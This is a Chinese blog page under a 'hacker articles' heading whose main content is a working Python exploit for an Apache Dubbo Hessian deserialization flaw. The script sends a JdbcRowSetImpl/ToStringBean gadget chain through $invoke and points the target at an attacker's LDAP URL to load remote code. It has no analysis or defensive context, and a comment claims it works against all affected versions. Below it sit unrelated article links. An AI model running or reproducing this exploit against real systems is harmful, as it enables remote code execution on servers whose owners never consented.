Apache Dubbo反序列化漏洞

访客4年前 (2021-03-30)黑客文章844

# -*- coding: utf-8 -*-importsys fromdubbo.codec.hessian2 importDecoder,new_object fromdubbo.client importDubboClient iflen(sys.argv)<4:print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))print(' Example: - python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))sys.exit()client =DubboClient(sys.argv[1],int(sys.argv[2]))JdbcRowSetImpl=new_object('com.sun.rowset.JdbcRowSetImpl',dataSource=sys.argv[3],strMatchColumns=["foo"])JdbcRowSetImplClass=new_object('java.lang.Class',name="com.sun.rowset.JdbcRowSetImpl",)toStringBean=new_object('com.rometools.rome.feed.impl.ToStringBean',beanClass=JdbcRowSetImplClass,obj=JdbcRowSetImpl )resp =client.send_request_and_return_response(service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',# 此处可以是 $invoke、$invokeSync、$echo 等，通杀 2.7.7 及 CVE 公布的所有版本。method_name='$invoke',args=[toStringBean])output =str(resp)if'Fail to decode request due to: RpcInvocation'inoutput:print('[!] Target maybe not support deserialization.')elif'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()'inoutput:print('[+] Succeed.')else:print('[!] Output:')print(output)print('[!] Target maybe not use dubbo-remoting library.')

标签: Apache Dubbo反序列化漏洞

返回列表

上一篇：三顾茅庐的主要内容（三顾茅庐赏析）

下一篇：浮躁的意思（你真的知道什么是浮躁吗）

相关文章

香港房产信息：MONTARA首批吸引价登场租金回报料

文章转载自：香港地产资讯网美联︰MONTARA首批「吸引价」登场租金回报率料逾3厘用家投资客势抢将军澳日出康城全新盘MONTARA4月26日公布首批124伙单位价单，折实平均呎价约13,9...

iphone微信上怎么导出语音聊天记录怎么才能找回以前的聊天记录啊

iphone微信上怎么导出语音聊天记录怎么才能找回以前的聊天记录啊夏日必不可少品类，怎能缺乏折叠伞。提及雨天，很多人表明厌倦，既不可以拍照pose又要举着千篇一律、老气横秋的折叠伞，太吃...

一个做电商的表哥，一年轻松赚五十万，也没有见他发货，是如何做到的？

一个做电商的表哥，一年轻松赚五十万，也没有见他发货，是如何做到的？

你说的这种是无货源模式，这种已经比较成熟了，最常见的是在闲鱼上做。这种模式很简单，模式是：自己先在闲鱼上开一个号，去拼多多、1688等网站挑选产品，把选好的产品放在自己闲鱼的店铺里面，别人在你的...

黑客在线QQ接单是不是真的

一、黑客在线QQ接单是不是真的方法总结 1、那些qq在线接单是真的吗?有些是真的可以做大家不要相信这个人【至尊黑客程序】在线接单他骗了好多。嗯,对,我也被他骗了50元! 2、网上有个黑客QQ,真的假...

手机怎么赚钱？你知道怎么用手机赚钱吗

手机怎么赚钱？你知道怎么用手机赚钱吗

文摘：用手机赚钱的可靠途径有哪些互联网的发展引发了几波财富积累热潮。现在通过网络做兼职或赚钱已经成为热门话题。后来移动互联网的发展，让很多人想办法通过手机赚钱。但通常很多方法都不可行，那么...

悠悠零食加盟店费用是多少?

悠悠零食加盟店费用是多少?

各人在选择加盟项目标时候，首先城市思量这一下悠悠零食项目标加盟用度是几多?现如今市场上悠悠零食加盟品牌的成长长短常的不错的，许多加盟商都很看好这一市场行情的成长。该品牌的产物也深受宽大消费者的喜爱。选...